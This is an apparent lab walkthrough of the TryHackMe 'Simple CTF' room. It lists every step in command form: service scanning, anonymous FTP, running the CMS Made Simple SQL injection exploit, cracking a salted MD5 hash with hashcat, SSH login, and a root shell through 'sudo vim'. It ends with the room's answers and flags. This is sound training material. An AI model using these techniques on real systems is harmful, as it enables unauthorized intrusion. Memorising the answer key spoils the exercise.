5 minutes
THM_SimpleCTF_Walkthrough
Simple Walkthrough for a TryHackMe Room
SimpleCTF TryHackMe
performed by: jb-williams
Simple CTF
Deploy the machine and attempt the questions!
Initial Scan
- First we run
nmap
on the target IP. - The first scan didn’t give me any info and even suggested adding
-Pn
to the command:
nmap -v -T4 -sV -sC -Pn -oA nmap/initial 10.10.237.242
- This output will provide the answers for the first two questions.
- In the
nmap
output I noticed that theftp
service on port 21 allowed anonymous login.
- Login to FTP
ftp -p 10.10.237.242
- And login as user
anonymous
- Then run
passive
to see if the output is:
Passive mode: off; fallback to active mode: off.
- Then running the command
ls
will show a directory calledpub
. - Change into that directory with
cd pub
and runls
again. - You will see a file called
ForMitch.txt
. - To download all files in the directory including
ForMitch.txt
run the commandmget *
, and you can exit back out to your terminal. - Viewing the contents of
ForMitch.txt
withcat
, you see that the user Mitch has a very simple password that is easy to crack.
- I ran
feroxbuster
on the target machine while if was going over the nmap output and ftp process.
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o ferox-initial.txt -t 15 -L 15 -s 200,302,304 -P http://localhost:8080 -e -u http://10.10.237.242/
- The main finds were paths
/simple/
and/simple/admin/
. - Traveling to the
/simple/
directory we see that the site is using a content management system CMS Made Simple. - Scanning that page you can see on the bottom left that the version is
2.2.8
- Using
searchsploit
we can see if there are any known exploits for this version.
searchsploit cms made simple 2.2.8
- The output shows that there is a known exploit
CMS Made Simple < 2.2.10 - SQL Injection
with the exploit path ofphp/webapps/46635.py
. - To get the full path and to look at the exploit run:
searchsploit -x 46635.py
- Noticed that it can be ran with
-u
for url-w
for path/to wordlist and--crack
to crack the password. So exited the pager. - After leaving the pager it will show the full path to that exploit.
Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
- I copied that exploit to my working directory and ran it:
python3 46635.py -u http://10.10.237.242/simple --crack -w ~/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
- Got an error and opened it up in a text editor.
- I noticed that the script started with
#!/usr/bin/env python
I changed it to#!/usr/bin/env python3
. - I also noticed that all the
print
statements were inpython2
syntax notpython3
. And need to change any of theprint "<Stuff>"
toprint ("<Stuff>")
. - To do this quickly all at once I closed the text editor and ran this command on
46635.py
.
note: this didn’t fully work… one edit needed to be made..shown below
sed -i 's#"."#(&)#g' 46635.py
- Thought I was being clever but it actually double parentheses a print statement for me on line
183
, so I changed that line from:
print colored(("<Stuffs>"))
to
print (colored("<Stuffs>"))
- With that done I re-ran:
python3 46635.py -u http://10.10.237.242/simple --crack -w ~/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
- The
--crack
option didn’t work but I did get output: salt for a password, a username, an email, and a hashed password.
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
- If you run the password hash through
hash-identifier
, it shows that the hash is likelyMD5
:
hash-identifier 0c01f4468bd75d7a84c7eb73846e8d96
- We can use
hashcat
to crack this, put it inpasswordhash:salt
format.
hashcat -O -a 0 -m 10 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt --show
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret
- The
-O
is to enalbe optimized kernel - The
-a 0
is the attack mode forMD5
- The
-m 10
is for the setup of the hash and saltpasswordhash:salt
- After the hash and salt the last bit is the path/to the rockyou.txt wordlist.
- Finding the password for mitch, we attempt to login through ssh port 2222
ssh mitch@10.10.237.242 -p 2222
- After logging in run
ls
you seeuser.txt
cat user.txt
- Also, running
ls /home
lets you see if there are any other users’ home folders.
- After getting the user.txt flag I ran
sudo -l
to see if there was anyting I could run as sudo with this user, and you can see that they are allowed to usevim
without a password. - Navigating to GTFOBins and search for
vim
, and you can see a couple commands for breaking out of restricted envirnments. I tried option(a)
.
sudo vim -c ':!/bin/bash'
- Running
whoami
you can see you are nowroot
. - Run a quick
ls /root
and seeroot.txt
.
cat /root/root.txt
Answers
How many services are running under port 1000?
- Answer:
2
What is running on the hight port?
- Answer:
ssh
What’s the CVE you-re using against the application?
- Answer:
CVE-2019-9053
(found in the comments of the exploit code)
To what kind of vulnerability is the application vulnerable?
- Answer:
sqli
What’s the password?
- Answer:
secret
Where can you login with the details obtained?
- Answer:
ssh
Whats the user flag?
- Answer:
G00d j0b, keep up!
Is there any other user in the home directory? What’s its name?
- Answer:
sunbath
What can you leverage to spawn a privileged shell?
- Answer:
vim
What’s the root flag?
- Answer:
W3ll d0n3. You made it!
written and performed by jb-williams - github
linux pentest escalation sudo scanning python searchsploit gobuster feroxbuster ftp hashcat vim cms tryhackme simpleCTF walkthrough
860 Words
2023-04-17 15:34